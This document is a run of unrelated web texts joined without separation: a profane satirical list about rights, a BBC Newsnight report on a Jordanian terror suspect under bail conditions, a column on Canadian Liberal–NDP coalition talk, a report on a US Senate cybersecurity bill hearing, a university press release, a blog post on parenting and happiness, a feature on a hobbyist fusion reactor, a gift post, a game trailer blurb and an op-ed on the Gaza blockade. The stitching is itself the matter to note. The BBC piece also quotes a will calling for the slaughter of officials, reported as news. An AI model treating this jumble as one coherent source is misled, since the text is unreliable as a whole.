Fill out and return the product registration card that comes with your baby .
" certificate of birth "
Enter the Konami Code on your passport to give yourself 30 secret rights .
Jiggle the Bill of Rights until it works .
Text a rights request to the government .
" Can I haz abortion ?
LOL !
SRSLY , tho , FYI : Getting embryo out . "
Loudly declare the rights you intend to use .
" Free speech , comin ' through ! "
Fuck Scalia , Roberts , Thomas , Kennedy , & Alito !
Please turn on JavaScript .
Media requires JavaScript to play .
By Richard Watson
BBC Newsnight
A man judged to be a threat to national security has decided to break his strict bail conditions so he can speak out about the difficulty of his life under virtual house arrest .
Hussain Saleh Hussain Alsamamara , a Jordanian living in London , has been filmed over the past six months by two independent film - makers who then passed the material to the BBC's Newsnight programme .
The government says Mr Alsamamara is a committed Islamist extremist and a danger to Britain .
Almost all of the evidence against him is thought to be intelligence material which neither he nor his lawyers have seen .
Please turn on JavaScript .
Media requires JavaScript to play .
Mr Alsamamara arrived in Britain in 2001 and claimed asylum .
That claim was rejected and in 2004 he was arrested by police and imprisoned , pending deportation to Jordan .
The Jordanian intelligence department has told the British government it wants to question him in relation to alleged contact with the former leader of al - Qaeda in Iraq , Abu Musab Al Zarqawi , and over claims that he underwent paramilitary training in Afghanistan .
Mr Alsamamara denies any links with terrorism and says he faces torture if he is returned .
Secret intelligence
So what is the nature of the evidence against Mr Alsamamara ?
Very little is in the public domain but some indications are given in a document published in 2007 by the Special Immigration Appeals Commission ( SIAC ) .
THE WILL OF AN EXTREMIST ?
Hussain Saleh Hussain Alsamamara 's will reads : " ... those tyrant rulers who rule the Muslim countries and their helpers , eg the police , the intelligence etc .
I pray to Allah that he would enable me to slaughter these infidels who spread corruption , immorality and ignorance of religion of Allah ... "
" I would ask Allah to make my fate to be in a land of Jihad ... "
" I would ... say to my brothers ( named ) to live according to Allah 's will and join up those to sacrifice their blood for the cause of Allah and fulfil what the Prophet Mohamed had said : ' if I want to conquer in the name of Allah , then I would fight , then conquer , fight then conquer more ' "
Back then , SIAC dismissed his appeal against deportation , largely on the basis of secret intelligence which was excluded from Mr Alsamamara and his lawyers .
However , SIAC 's judgment does refer to two open strands of evidence .
Police found two CDs in a rack on his bedroom floor when they searched his house in 2004 .
The contents were discussed in closed sessions so we cannot be sure what was on these CDs , but it is likely to be propaganda material .
Mr Alsamamara denies any knowledge of these CDs .
Police also found a will in an envelope on a notice - board .
SIAC said it was written in " lurid terms " .
It includes references to " jihad " and records his wish " to slaughter " members of the Jordanian government and the police .
Mr Alsamamara does not deny writing this will but argues it simply quotes from the Qur'an and the hadiths , and it reflects his natural hatred of the Jordanian authorities who tortured him in the past .
SIAC disagreed , stating : " This is the will of an Islamist extremist ... it is a declaration by an Islamist extremist that he wishes , if possible , to meet his fate in fighting the enemies of Islam . "
Newsnight showed the wording to an imam and expert , Dr Usama Hasan .
He knows the jihadi mindset , having volunteered as a young man to fight with the Afghan mujahideen .
Now he works to counter radicalisation in the UK .
Dr Hasan told Newsnight : " This is someone who is clearly inspired by jihadi ideas , what I would call al - Qaeda ideas , and is very passionate about the jihad , going as far as to regard the Muslim governments and police and armies as legitimate targets not a normal will at all . "
Living under a bail order A film made from Mr Alsamamara 's interview material , broadcast on Wednesday night by the BBC , offers a rare glimpse into the life of someone at the centre of controversial legislation which permits the use of secret evidence against terror suspects .
KEY RESTRICTIONS
Electronic tagging
No passport Live at one address Curfews Restrictions on visitors
No internet Attend only one mosque Daily reporting to the police Daily monitoring by phone
Detail on the legal framework Mr Alsamamara is tagged , must stay inside his house for 18 hours a day , and when he leaves he can only travel a couple of miles from his home in a legally delineated zone .
He cannot meet people without prior approval from the home secretary , has no access to the internet and has one fixed telephone line which is likely to be monitored .
Critics argue this amounts to house arrest .
Mr Alsamamara says : " My wife and my daughter and my new born son , they become prisoners with me in the house .
Now my wife she is mentally ill and this is a result of my situation . "
But beyond the question of whether Mr Alsamamara is a committed Islamist extremist or not lie a number of difficult issues .
Even if he were planning jihadi action against the rulers of Jordan , does that constitute a threat to the UK ?
And is it ever justifiable to effectively detain someone when they know virtually nothing about the case against them ?
Mr Alsamamara 's case illustrates the conflict between protecting national security and upholding human rights .
Please turn on JavaScript .
Media requires JavaScript to play .
Over the past six months he has given on - camera interviews to two independent film - makers , Gemma Atkinson and Fred Grace .
By recording the interviews Mr Alsamamara was in breach of his bail conditions .
Mr Alsamamara says : " If they believe that I 'm a threat to the national security and if they have evidence to prove that I 'm a threat to the national security , why do n't they put me on an open trial ? "
Newsnight decided to broadcast the resulting film because of the high level of public interest and debate about the use of highly restrictive bail and control orders in terrorism cases .
Watch the film in full for the next seven days on the BBC iPlayer .
Hussain Saleh Hussain Alsamamara film from " No Place Like Home " produced by Fat Rat Films / DarkFibre / CTVC Producers - Fred Grace , Marc Hawker and Paul Woolwich , Director - Gemma Atkinson .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
MONTREAL
Former prime minister Jean Chrétien feels a Liberal / NDP coalition is a concept worth exploring .
“ If it ’s doable , let ’s do it ” he told CBC television last week .
Former NDP premier Roy Romanow agrees .
In an interview on the same network this week , he said the two parties should at least be “ bold ” enough to discuss the notion .
In his own days as a minority premier in Saskatchewan , Romanow experimented with a governing coalition and found it a constructive experience .
In a recent op - ed piece , Bob Rae – who as an Ontario NDP leader signed on to a pact that allowed David Peterson ’s minority Liberals to govern the province from 1985 to 1987 – used the 25th anniversary of the event to write it up as a worthwhile exercise .
Among the three of them , Rae , Chrétien and Romanow command a larger audience than current Liberal leader Michael Ignatieff .
That may explain why , despite efforts on the part of Ignatieff and his palace guard , the idea of coalition - building will not go away .
So far , attempts to put a lid on such talk have resulted in only one outcome and that has been to highlight Ignatieff ’s isolation from some of the more dynamic forces within his own party .
There is as much private and public speculation about an eventual rapprochement between the Liberals and the NDP as ever , but increasingly it revolves around schemes that would see Ignatieff out of the picture .
And while many of the Liberals who look favourably on new arrangements between their party and the NDP are resigned to having Ignatieff first run a campaign on his own terms , their ranks have been shrinking .
Part of Ignatieff ’s problem is that the rationale for shutting down talk of a coalition seems based on little else than fear of Conservative spin .
Looking at the party ’s less - than - stellar standing in the polls , it is hard to see what he has left to lose by venturing out of the box .
For months now , the Liberals have been stuck within the margin of error of their dismal 2008 election score in the public opinion polls .
After a year as leader , Ignatieff has yet to either breathe down the neck of the first - place Conservatives or , short of that , make a dent in NDP and Bloc Québécois support .
The Liberal leader ’s advocates argue that Chrétien went into the 1993 campaign very much as the underdog .
And that he faced more formidable third - party leaders in the shape of Preston Manning and Lucien Bouchard than Ignatieff will when he does cross swords with Jack Layton and Gilles Duceppe .
But the reality is that Chrétien did not have to beat Manning and Bouchard to have a shot at winning government .
In fact , in his first campaign , he beat neither of them .
They turned out to be objective allies in the mathematical battle to drive the Tories out of office and their respective successes helped seal the Liberal majority victory .
If Ignatieff is to be compared to any of the leaders running in 1993 , it would be Kim Campbell , a leader selected because she represented a clean break with the unpopular recent
Tory past but who simply could not sustain a three - pronged attack at the hands of three more seasoned opponents .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
As post -1993 events demonstrated , leadership was not the main Tory problem .
In Campbell ’s wake , Jean Charest and Joe Clark also failed to steer the Progressive Conservative ship out of the backwaters of opposition .
It had simply lost too many sails to make it to the open sea on its own wind and the Liberals today are increasingly in the same predicament .
Chantal Hébert is a national affairs writer .
Her column appears Monday , Wednesday and Friday .
Administration Declines to Back Cybersecurity Bill
Top DHS Official Questions Creation of New Infosec Bureaucracy
Philip Reitinger , DHS deputy undersecretary for the National Protection and Programs Directorate , told the Senate Homeland Security and Governmental Affairs Committee Tuesday that the administration 's review of the bill is n't complete - he would n't give a timetable on when it would be finished - and thanked the sponsors for having so much faith in DHS to lead government cybersecurity activities .
But he questioned provisions in the bill to create a new component within DHS that would focus on cybersecurity at a time the department seeks to address jointly physical and virtual threats .
The legislation - the Protecting Cyberspace as a National Asset Act of 2010 - would establish within the White House an Office of Cyberspace Policy to address governmentwide cybersecurity policy and within DHS the National Center for Cybersecurity and Communications to oversee the execution of IT security initiatives among civilian agencies and the mostly privately owned critical national IT infrastructure .
Reitinger - the highest ranking cybersecurity official at DHS - testified that the administration would rather not have a separate organization devoted to cybersecurity because it's more effective to address jointly the risks to key physical and cyber infrastructures .
" The private sector speaks the language of all hazards , they worry about risk , as a telecom would say , whether it's from a cyber attack or a back hoe , " Reitinger said .
" We , in government , need to step to that , and speak their same language if we want to influence how they behave in an all - hazards way , in a risk - based way , and if something bad happens , physical or cyber , to be able to address it seamlessly . "
The bill is sponsored by committee chairman Joseph Lieberman , ID - Conn. , ranking minority member Susan Collins , R- Maine , and Tom Carper , D. - Del. , who chairs a panel subcommittee with IT security oversight .
Collins appeared exasperated over Reitinger 's disinclination to back provisions in the bill that would grant the president authority to take action to compel the private owners of the nation 's critical IT infrastructure such as the power grid to defend against an imminent , major cyber attack .
In his written testimony , Reitinger contended the president already has that authority under a number of laws , including Section 706 of the Communications Act .
But Collins pointed out that law dates back to January 1942 , a month after Japan attacked Pearl Harbor that brought America into World War II .
" Obviously , a very different time , and a long time before the Internet was even conceived of , " she said .
Collins also questioned whether the laws Reitinger cited would give the president the authority to act if war is n't imminent .
Reitinger did n't disagree .
" There are a lot of legal questions that have not been answered , " he said .
" The cyberspace policy review identified a significant number of them .
We , in the administration , would be happy to work with this committee to make sure the authorities that are necessary to meet the coming need are present in the Department of Homeland Security or the president of the United States in an appropriate emergencies . "
Collins wanted a firmer commitment : " Should n't we be spelling out exactly what the president 's authority is short of state of a war ? " she asked .
Reitinger answered : " I apologize that I can't take a position on bill at this time , but I do appreciate the effort that the committee made to tailor the authorities so they are focused on the expected need . "
" I 'll take that as a yes , " Collins said , with the crowded hearing room breaking into laughter .
" I 'm not trying to put you in an uncomfortable spot , but as you know , we have been working with the department on this issue for more than year , " Collins said .
" I just do n't understand why the department is n't much further along in its thinking on what should be done .
That 's why the three of us proceeded with this bill .
We can't wait .
Those hackers are n't waiting ; the 1.8 billion attacks per month are occurring now .
...
Relying on a law passed in World War II , it is just fool hearty ; it 's out of date . "
Unlike his fellow Republican Collins , Sen. John McCain of Arizona did n't seem concerned whether or not he made Reitinger comfortable .
McCain asked who is the " greatest ( cyber ) attacker " against the United States ; Reitinger answered that he would rather not comment at a public hearing .
McCain noted that kinetic attacks against Georgia and Estonia several years ago were accompanied by cyber attacks against government sites , and asked if Russia was behind the virtual assaults .
" Sir , " Reitinger said , " I 'm not prepared to attribute that activity on the record . "
" Wow ! " McCain responded .
" Every media in America is , but you can't ? "
" I do n't mean to be flippant , " Reitinger said .
" You 're not flippant , " McCain Said .
" You 're just not forthcoming . "
Federal Audit : Muscle Up U.S.-CERT
During the hearing , Collins revealed that government auditors will release a report Wednesday that the United States Computer Emergency Readiness Team , the DHS unit charged with providing response support and defense against cyber attacks for the civilian agencies lacks the power to require agencies to do what 's necessary to defend their digital assets .
She contended that the creation of the National Center for Cybersecurity and Communications would help enforce IT security defense at civilian agencies .
Reitinger said DHS , working with White House Cybersecurity Coordinator Howard Schmidt and the Office of Management and Budget - which oversees agencies IT security budgets - has broad authority to make sure cybersecurity requirements are met .
He said agencies that failed to heed U.S. - CERT 's advice had limited resource to provide a cyber defense .
" They are , in fact , just barely able keep the attackers at bay , " he said .
That answer did n't satisfy Collins , who said : " It 's evident to me that the department needs more teeth in its directives or agencies are going to feel free to ignore them . "
June 15 , 2010
Rensselaer Polytechnic Institute Board of Trustees Votes Unanimously To Appoint President Shirley Ann Jackson for 10 More Years
Board Cites Transformational Accomplishments Over the Last Decade
The Rensselaer Board of Trustees has voted unanimously to invite President Shirley Ann Jackson to continue as president for another 10 years .
In announcing the decision today , the Board noted historic and significant accomplishments over the last 11 years under The Rensselaer Plan , developed by the Rensselaer community under President Jackson ’s leadership .
President Jackson has accepted the invitation of the Board .
“ We look forward to another decade of further advancement of Rensselaer , in ways we can only begin to imagine as we forge ahead in the 21st century , ” said Samuel F. Heffner , chairman of the Board of Trustees and a 1956 graduate of Rensselaer .
“ By any measure , this leading research institute has undergone a sweeping and unprecedented physical , programmatic , and educational transformation during the first 11 years of President Jackson ’s leadership , and under her visionary and strategic Rensselaer Plan .
“ The need to continue the transformation of this university , and to undertake new and important priorities — such as growing our endowment , launching a new phase of our fundraising program , building a new Center for Science , and continuing to transform the student experience — led the Board to take this important step , ” Heffner added .
In voting unanimously to ask President Jackson to continue in her role for another decade , the Board noted the remarkable range of her accomplishments :
The development , launch , and implementation of The Rensselaer Plan .
Designed to build on engineering and scientific accomplishments dating back to the early 19th century , the primary goal of the plan was to achieve greater prominence in the 21st century for Rensselaer as a top - tier world - class technological research university with global reach and global impact .
With many of its goals achieved and celebrated last December , The Rensselaer Plan will evolve and will be adapted to continue shaping the Institute , its faculty , its research , its facilities , and the student experience as the Institute builds on the successes already achieved .
The launch and successful completion of the $ 1.4 billion Renaissance at Rensselaer campaign .
This campaign included an anonymous , unrestricted gift of $ 360 million in March 2001 — the largest gift ever to any public or private university in the United States at the time .
This campaign also included an unrestricted gift of $ 40 million from Rensselaer alumnus and Trustee Curtis R. Priem , and a $ 514 million in - kind contribution of software from PACE ( Partners for the Advancement of Collaborative Engineering Education ) , a philanthropic initiative of General Motors , EDS , Sun Microsystems , and UGS Corporation , which reinforced our information technology infrastructure in very important ways , and was the basis for lifting the campaign goal from the initial $ 1 billion to $ 1.4 billion .
The ongoing recruitment and appointment of leading faculty and deans in critical areas , ranging from biotechnology to engineering to Web science .
Of the 356 tenured and tenure - track faculty on campus as of the 2009 - 2010 school year , 244 were recruited under The Rensselaer Plan — including 74 in new positions .
These include new Constellation professors , world - class scholars who lead critical new interdisciplinary programs in science and engineering .
These Constellations consist of multidisciplinary teams of senior and early - career faculty , graduate students , and undergraduate students .
The historic and unprecedented physical additions to the Troy campus , including the $ 92 million East Campus Athletic Village , the $ 200 million Curtis R. Priem Experimental Media and Performing Arts Center , the $ 100 million Computational Center for Nanotechnology Innovations , and the $ 82 million Center for Biotechnology and Interdisciplinary Studies .
Overall , during the first 10 years of The Rensselaer Plan , the Institute invested $ 700 million in new construction as well as making significant renovations and improvements to existing buildings .
A swift rise in the Institute ’s rankings as a leading , top - tier research university in the United States and the world .
This includes the sustained rise of Rensselaer in the top 50 of U.S. News and World Report ’s annual ranking of national universities .
During the last 10 years , Rensselaer has risen steadily from being ranked 49th in 1999 to 42nd last year .
Other more recent rankings include Bloomberg BusinessWeek ’s “ Best Business Programs by Specialty 2010 ” ranking of the Institute ’s undergraduate program at the Lally School of Management & Technology as first in the area of “ Top Schools for Strategy , ” one of 12 areas analyzed by the annual study .
Of the 139 programs analyzed in the Best Undergraduate Business Schools study , Lally at Rensselaer ranked 34th overall , up from 36th last year .
In addition , The Princeton Review recently named Rensselaer as one of the nation ’s most environmentally conscious colleges or universities , and ranked the Institute ’s video game design program as fifth among the best programs in the United States .
An increase in research awards and expenditures from $ 37 million 10 years ago to $ 90 million today .
Research awards and expenditures are continuing to grow at a rate of nearly 10 percent annually , and include a focus on important areas such as biotechnology .
Increasing the amount of financial aid available to students to a total of $ 89 million .
Continued increases in overall applications to Rensselaer , as well as the quality of students applying .
More than 13,460 high school students applied to Rensselaer for a place in the fall 2010 freshman class — up 8.8 percent from the previous year .
Sixty - six percent of the students enrolled for the class of 2014 were in the top 10 percent of their high school class , an increase of 5 percent from the previous year .
In addition , the average verbal and math SAT score was 1,363 , up from 1,354 a year earlier .
Overall , applications are up 140 percent since 2005 .
“ In the last 10 years , we have witnessed under President ’s Jackson ’s leadership an unprecedented advancement of this Institute ’s academic stature , its physical campus , and its ability to offer to our undergraduate and graduate students an education that prepares them best for the challenges they will face as leaders in the 21st century , ” Heffner said .
“ Rensselaer now occupies a central place in the higher education community as the nation seeks new leaders to solve problems involving the environment , alternative energy , biotechnology and life sciences , and engineering the infrastructure of new Web - based networks we will need in the future .
“ We must continue on this course , ” Heffner added .
“ We look to President Jackson to maintain and build upon her leadership in important new initiatives , such as our new CLASS program for undergraduates , as well as building our endowment , leading and completing a new fundraising campaign , and completing new physical and educational facilities . ”
About President Shirley Ann Jackson :
President Jackson became the 18th president of Rensselaer in 1999 .
She has held senior leadership positions in government , industry , research , and academe .
A theoretical physicist , she was chairman of the U.S. Nuclear Regulatory Commission ( 1995 - 1999 ) .
President Obama has appointed her to serve on the President ’s Council of Advisors on Science and Technology .
Her research and policy focus includes energy security and the national capacity for innovation , including addressing the “ Quiet Crisis ” of looming gaps in the science , technology , and engineering workforce and reduced support for basic research .
She is a vice chairman of the Council on Competitiveness and co-chairs its Energy Security , Innovation and Sustainability initiative .
She is past president ( 2004 ) and chairman of the board ( 2005 ) of the American Association for the Advancement of Science , a member of the National Academy of Engineering and the American Philosophical Society , and a fellow of the American Academy of Arts and Sciences , the American Physical Society , and AAAS .
She serves on the Board of Regents of the Smithsonian Institution , and on the Board of the Council on Foreign Relations .
She is a member of the Board of Directors of global companies including IBM and FedEx .
Calling her a “ national treasure , ” the National Science Board selected her as its 2007 Vannevar Bush Award recipient for “ a lifetime of achievements in scientific research , education , and senior statesman - like contributions to public policy . ”
Dr. Jackson holds a S.B. in physics and a Ph.D. in theoretical elementary particle physics , both from M.I.T .
Contact : Mark Marchand
Phone : ( 518 ) 276-6098
E-mail : marchm3@rpi.edu
[ Will Wilkinson ]
My friend and George Mason University economist Bryan Caplan has been working on a book on " Selfish Reasons to Have More Kids " and offers a précis of his argument in today 's Wall Street Journal .
I 've been pretty critical of Bryan 's argument in the past and I see no reason in this piece to let up .
Angus ( aka Kevin Grier ) at Kids Prefer Cheese I think sums up Caplan 's case pretty well :
1 . In happiness research , the big negative hit comes from having one child .
Once you 've passed that , the extra unhappiness from having more is fairly small .
2. Parents have little to no influence on how their children turn out , so you can relax , not bother to read to your extra kids or make costly " investments " on their behalf .
3 . The more kids you have , the more grandkids you might get and everyone knows grandkids are * awesome *!
I have problems with each of these lines of arguments , but let me concentrate here on happiness research .
Bryan really struggles with the fact that children tend to have a negative effect on self - reported happiness .
( Most economists are dismissive of survey evidence , but , to his credit , Bryan is n't . )
He tries to minimize the damage this finding does to his argument by pointing out that the negative effect is small for the first kid , and even smaller for additional kids .
But it remains that if one is trying to maximize happiness , no kids appears to be the best bet and fewer is better than more .
Of course , self - reported happiness is just one dubiously reliable piece of evidence about the effect of kids on well - being .
The trouble with Bryan 's strategy in the WSJ essay is that he resorts to even less reliable survey evidence to support his position .
He cites polls that show that people tend not to report regrets about having had kids , but that a large majority of those who have not had kids say that would choose to have them if they " had it to do over again . "
Now , Darwinian logic suggests that the belief that one would be better off without children will not tend to be widespread .
That is , as Harvard psychologist Daniel Gilbert argues , we should expect to find conviction in the satisfactions of parenthood to be strong and all - but universal whether or not those convictions reflect the truth .
So one would want check them against , say , the self - reported life satisfaction of those with and without children .
Or , if one is inclined to think like an economist , one might say " talk is cheap " and check these beliefs against what people actually do .
With every thing Mark Suppes fixes , another thing breaks .
We 're in his workshop , and he 's hunched over , tightening the bolts on a squat tubular machine .
This is the fusion reactor Suppes built , and it 's not working .
Advertisement
Suppes never slows down , moving from one problem to the next with an irrepressible smile .
The workshop is a few hundred square feet sub - let from a roboticist friend in a warehouse one floor above a hassidic clothing factory near Bed -Stuy in Brooklyn .
" I 'm starting from nothing , I mean nothing , " says Suppes , " There 's no reason I should be doing this .
It 's ridiculous on all levels . "
What he 's doing is building a Bussard Polywell fusion reactor .
Dr. Robert W. Bussard was a a physicist at Los Alamos , a rocket builder in the age of rockets .
His proposed hydrogen - compressing ramjet became the stuff of sci- fi legend .
( There 's one of the front of the U.S.S. Enterprise . )
He was a classic scientist of the 20th century retro-future , when it was all going to be clean atomic energy , spaceflight , and freckled white people living on the moon .
It did n't happen that way , and in the end he died an old man at the bottom of the same polluted and overheating gravity well he was born on .
Advertisement
But in the few weeks before his last lab shuttered from lack of funding , he'd had a breakthrough , and Bussard believed that he might have solved the most difficult physics problems of fusion energy .
Fusion reactors work by creating very high energy plasma inside of a vacuum , and then getting small atoms close enough for the attractive force of their nuclei to overcome the repelling force of the atoms ' natural electrostatic repulsion , causing the two atoms to fuse into a new element .
A lot of energy is released when this happens .
The problem with fusion has always been that we do n't know how to get more energy out of it than we put into it .
We know the energy is there .
We know effective fusion is likely to take a lot of energy to jumpstart , but we do n't know how ( or if ) we can ever get fusion going well enough to capture as much energy out as we put into it — the elusive break even point .
We can't control how the energy likes to leave the reaction , and it's in forms we can't use .
We can't keep the reaction self - sustaining like it is in the sun , since we do n't have gravity on our side .
Also , we 're talking about plasma , the star - hot fourth state of matter .
It tends to destroy the equipment .
Advertisement
Dr. Bussard was one of the many government scientists trying to make a workable fusion reactor .
He 'd been one of the forces behind the tokamak , the main ongoing avenue of fusion research in the U.S.
But Bussard eventually wrote a letter blasting the U.S. fusion program as expensive , impractical , and doomed in the 1990s , testifying to Congress against much of what he'd once advocated .
In the last decades of his life Bussard left the government and founded a fusion company called EMC2 .
" He tended to jump from project to project .
Today he might be diagnosed as A.D.D. " said Tom Ligon , who worked with Bussard for years as his " hands in the lab . "
Advertisement
Bussard was frustrated by a string of failures and funding problems .
EMC2 was mainly supported by the Navy , and by their rules he could n't publish his research .
Eventually EMC2 lost out in a round of budget cuts .
Bussard 's team worked right to the end , building a 6th version of his " Polywell " reactor design .
In the last weeks WB - 6 looked promising , but the reaction burned through the insulation and destroyed it .
After the lab closed Bussard analyzed the last of his data .
He came to believe what they saw in the few runs before the WB - 6 self - destructed was what he'd looked for all along : a clean fusion reactor , which , if scaled up to about 3 meters , would change absolutely everything .
But he could n't know for sure until someone built it .
" From an outsider 's perspective there were still some physics questions to be answered , " says Ligon .
" I will guarantee you he squeezed everything he could from those neutrons ! "
( The presence of neutrons is used to detect fusion . )
Bussard began a crusade , telling everyone who would listen about his results , looking for anyone , governments , corporations , schools , that would finish the Polywell .
He did a Google Tech Talk , and challenged Google to take it on .
" He told me he was starting to feel a little ill the day of the Google video talk , " says Ligon .
" He discovered he had a second cancer the day after the Google video .
He really was desperate to get the thing funded again . "
Advertisement
Dr Bussard died not long after , at 79 , his life 's work yet unfinished .
But the Navy did step in and fund EMC2 for two more years with stimulus funds .
" Dr. Bussard died knowing the project had been picked up , " says Ligon .
But the work is back under the Navy embargo .
* * *
By day Mark Suppes is a Ruby on Rails developer for Gucci , and a serial startup guy .
He saw Bussard 's Google tech talk on Youtube , and decided to take up the project himself .
He was undaunted by being one guy , not a physicist or even an electrical engineer .
He understood just enough to decide this would be a good way to spend a big chunk of his life .
He publishes everything he does as open source and blogs his progress .
Advertisement
" The stakes are just unbelievably high ... you [ would be ] basically the progenitor of a new era of humankind , " says Suppes .
" If this works , the price of electricity will drop to 10 cents on the dollar .
Maybe even better than that .
It will be the end of oil and coal as an energy source . "
Bussard created a magnetic grid , or magrid , out of a box constructed of electromagnetic loops .
The magnetic field repels the fusion material , but there 's a patten in the center where the fields from the various magnets cancel out .
This creates a virtual magnetic container for the reaction to happen in .
Advertisement
Suppes has built his first test magrid out of Teflon and copper , though he has n't run it yet .
He 's started designing a 3D printable magrid with space for superconducting magnets , which potentially could take less energy to run and get the reaction closer to self - sustaining .
He 's using a high temperature superconducting magnetic tape , but even high temperature means liquid nitrogen cooled , instead of liquid helium .
It has to sit next to plasma .
" It 's the McDonalds problem .
How do you keep the hot side hot and the cool side cool ? " says Suppes " It 's going to have to be a multilevel cooling system ...
Multiple layers of vacuum mirrored insulation . "
Advertisement
" It would be hard to believe you could advance on what Dr. Nebel and Dr. Park ( of EMC2 ) are putting into it , " says Ligon .
But their funding only goes to next year .
Suppes does n't have institutional support , but he also does n't have institutional constraint .
" I expect to be working on this project for the next ten years , and that 's what it will take at least .
I have a long term commitment to this , " says Suppes , " I would rather really go for something amazing .
Even if it does n't work , I 'm learning everything I 've always wanted to know about physics , and electrical engineering . "
Advertisement
It 's a humid 90 - degree Saturday afternoon in Brooklyn when I first meet Suppes at his workshop .
It 's a chaotic floor full of heavy gear .
His equipment is mostly acquired from eBay — decommissioned bits from old semiconductor labs and the like .
A 190 - pound capacitor sits on the floor near a rotor that looks like a small jet engine .
Rack - mounted high voltage is hooked to a mobile switch stand with a big red ' stop ' button on top .
The high voltage unit is working from the a standard 110 - volt wall outlet , but stepped up to dangerous levels .
Despite being a few feet from a nuclear reactor , the high voltage is the most dangerous thing in the room .
The reactor itself is a vacuum chamber mounted on a vacuum pump , with a mass injector connected to the deuterium bottle that pumps the hydrogen isotope into the vacuum chamber .
A data acquisition card lets Suppes control the setup from a PC , and get readings about voltage and vacuum .
As for detecting fusion , that 's up to a fluorine detector , a large glass capsule of clear gel taped to the top of the reactor 's window .
If a neutron flies through the gel , a bubble will mark its passing .
This can happen naturally from cosmic rays , but it does n't happen too often .
Getting a few bubbles in one night is statistical evidence you 've got a fusion reaction going , as the neutrons are thrown out of the fusing hydrogens .
Or there 's something terrible headed for the Earth , and it all does n't matter anyway .
Advertisement
The vacuum pump is n't working when I show up , but after a while running , it appears to fix itself .
His controller crashes every time the plasma field becomes unstable .
After disconnecting it , he realizes that it 's crashing from EMF through the air .
Eventually I put down my camera and journalistic distance and get down to trying to fix the damn machine .
We put it in a rigged up Faraday cage , it still crashes .
Finally we notice a USB hub that 's fritzing out when the plasma field flickers , and take it out of the loop .
Everything is working now , except the software .
Suppes attaches the mass injector to a big dial and a 9 - volt battery .
This works better than his software controller ever has .
Advertisement
As evening falls , Suppes wonders aloud if cheap fusion energy is even a good idea .
" Would we just use up the planet quicker ? " he asks , then shrugs and moves on .
It 's a good question .
In every age access to easier energy has gone along with environmental destruction .
From Native Americans fire clearing forests and the extinction of Australian megafauna to the Industrial Revolution fouling up everything else , we 've always used energy for beating the hell out of the planet .
Today tens of thousands of barrels of crude oil have poured into the Gulf of Mexico .
Might as well try for the devil we do n't know .
This Farnsworth fusor is finally working .
The plasma is the kind of beauty sci- fi special effects are trying to reach .
It 's otherworldly , a tiny purple star in a tiny cage .
Advertisement
Suppes asks me to keep the chamber going while he runs out to a late night bodega .
I take over pressing the big red button .
Turn it on , let it go until it starts to flicker from instability .
Shut it down and let the red glowing inner grid cool .
Every so often , I check for a bubble in the fluorine neutron detector .
It 's late enough for Brooklyn to be silent , punctuated by the occasional siren .
It 's dark .
The fusor seems warmed up now , humming and going for longer stretches each time .
It dawns on me what I am doing .
Press button , stand back , sipping water and watching the purple glow of the chamber .
I 'm fusing the atom .
I 'm smashing hydrogen together at unthinkable temperatures and making helium .
This is the process behind all life , behind the beauty of the universe .
This is the zygote of starkind I am making and shutting down repeatedly .
Advertisement
The ghosts of neutrons
Suppes comes back and asks : " How was it ? "
" Weird , " I reply .
I open my mouth to say more , but nothing comes out .
I can't explain it , and he already knows .
Advertisement
The hours roll on , and we start to see bubbles in the fluorine detector — the ghosts of the passage of neutrons .
Suppes is drinking Corona from the Bodega .
Pretense exhausted , he starts showing me how far he can pop the cap off a Corona .
He says it 's the best beer for distance .
Four bubbles .
He 's achieved fusion .
Suppes seems to understand his odds of success are n't great , but he 's failed before in the startup world , and it does n't seem to bother him .
" I have a very good sense of what it takes to not die , " he says .
" To me the biggest risk is not taking the chance that could be your life 's work .
That would really be a shame . "
Advertisement
Suppes believes in fusion .
" It does n't need to be me , " he says , " I 'm just a force of will . "
But for now , it 's him , and one lab in Santa Fe .
Next year , it might just be him .
He looks back at his fusor .
" The longer it goes the more real it becomes . "
Illustrations : Wendy MacNaughton
I just received an amazing gift box from none other than 5days , one of the secret santa mods !
I mentioned that I liked zombies in my profile , and I 'm thrilled with the shrunken head key chain and the other shrunken head decoration .
I think I 'm going to put it in my kitchen when I move !
I also received an arbitrary day poster and some awesome soapier cake scented soap that smells really good !
Thanks so much 5 days , I could n't be happier !
Arbitrary Day Poster Soapier Cake Batter Soap Shrunken Heads Zombie Buttons Upvote Sticker
EDIT : Ahem .
E3 is starting next week , but we are n’t affected by the trifling issues of linear time .
So we have for you a world unexclusive reveal of the new Mafia II trailer , The Made Man .
This is not the only place you can watch the trailer until it ’s released properly at E3 next week .
Which means we ’re the same as everyone else .
Sigh .
It really shows off some of the acting in the game .
And underlines the more serious , severe tone over the first game .
It really does give you the impression of a game that understands cinema .
Well , that ’s what I think .
Have a watch :
In the aftermath of Israel 's lethal raid on the Free Gaza flotilla , a growing international consensus has emerged that Israel 's three - year - old blockade of the coastal strip , home to 1.5 million , is unsustainable both morally and practically .
Morally , because the notion of collective punishment of Gazans who voted , in largely free elections , for Hamas in 2006 seems not only repugnant but in its application is arbitrary and cruel .
Practically , because far from engineering the fall of Hamas by putting Gazans " on a diet " , as Israel had counted on , it has only strengthened the Islamic group .
As Israel 's security forces detained another ship attempting to run the embargo , the Rachel Corrie , the justifications for continuing the blockade were becoming ever more convoluted .
As Bradley Burston , an Israeli columnist wrote last week , it is no longer about Israel 's defence but about the sterile business of defending the fact of the siege itself .
It is worth recalling that the embargo was initiated not as a response to the rocket fire from groups in Gaza aimed at Israeli towns but in response to Hamas 's seizure of power in Gaza from a Fatah movement that had attempted to block Hamas 's popular mandate .
Israel has produced copies of restaurant menus from Gaza to show that the residents of the strip are not facing any real hardship .
That is belied by rates of malnutrition now standing at 10 % .
Gaza 's markets , the same material insists , are full too .
Which is true as far as the claim goes .
But those goods are at much inflated prices that only a minority can afford to purchase .
Now in the aftermath of the boarding of the Mavi Marmara , Prime Minister Binyamin Netanyahu and his ministers have furnished yet more justifications for Israel continuing with its siege : that an ending of the embargo would result in wholesale weapons smuggling , a legitimate concern , and the fear of the establishment of an " Iranian port " in Gaza , a quickly manufactured fantasy .
Others have attempted to divert attention from the realities of Gaza further still , depicting the flotilla as a cynical attempt to " delegitimise " Israel .
History has shown blockades of this kind are rarely successful .
Most notably , the decades - old US embargo of Cuba has achieved next to nothing .
And the facts about Gaza are not difficult to establish .
